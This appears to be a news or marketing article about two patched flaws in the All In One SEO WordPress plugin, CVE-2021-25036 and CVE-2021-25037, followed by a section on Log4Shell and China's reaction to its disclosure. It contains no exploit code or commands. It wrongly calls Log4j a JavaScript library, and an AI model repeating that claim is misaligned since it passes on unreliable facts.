Over 800,000 websites remain vulnerable to a pair of critical security flaws in a popular WordPress SEO plugin, emphasising the importance of regular updates and patches to websites, as well as working with white label development teams to solve any issues.

The All In One SEO plugin, which has been used in over 3m websites, was patched several weeks ago, but it is estimated that 820,000 webmasters have yet to deploy this update and until they do they are at risk of takeover attacks caused by two major security oversights.

Whilst unpatched and not updated to version 4.1.5.3., these two vulnerabilities can cause major damage with exceptionally limited access, and security experts have implored webmasters to check they are safe.

How The Exploits And Takeover Attack Works

The All in One SEO plugin, before its most recent update, was vulnerable to two major security flaws:

CVE-2021-25036, a critical level flaw that allows for Authenticated Privilege Escalation, enabling Subscriber and other low-level accounts to have Webmaster-level privileges.

CVE-2021-25037, a severe level Authenticate SQL Injection exploit that allows arbitrary code to be executed on the server.

Both are potentially harmful on their own, but together they can be used to add malicious code to the server that would be executed when people load a website, and privilege checks become trivially easy to circumvent by changing a single character to an uppercase letter.

This could also be used to create ‘htaccess’ backdoors which could be used to facilitate further cyberattacks in the future.

However, it must be noted that AIO SEO responded quickly to the vulnerability and pushed a patch that removed both exploits for websites that deployed it.

Other Major Vulnerabilities

Another major recent vulnerability that has been patched and had a potentially wider reach was a vulnerability that affected the widely used javascript logging library Log4j.

Initially, a problem came from a vulnerability known as Log4Shell, an incomplete fix of this led to a second exploit that allowed for remote code execution, which would potentially allow servers to be taken over and used to stage distributed denial-of-service (DDOS) attacks.

This is a major issue, as a range of services such as Cloudflare, Red Hat Linux, Twitter, Amazon Web Services and even Tesla’s software packages, as well as video games such as Minecraft, where a simple message in the chatbox allowed for remote code execution.

This ended up causing controversy in China, as the vulnerability was initially reported to Log4j’s developer, Apache Software Foundation, without alerting the Chinese Ministry of Industry and Information Technology, causing a six-month suspension of a partnership between them and Alibaba Cloud.

This has also led to a request by the Chinese government for state-owned companies to migrate services and data that was previously stored on Alibaba Cloud and Tencent servers to a state-controlled cloud system.

Due to the relative ease of the exploit and the potential high damage it can cause, Log4j has been repeatedly patched, and the situation continued to be monitored after the initial exploit was posted in early December 2021.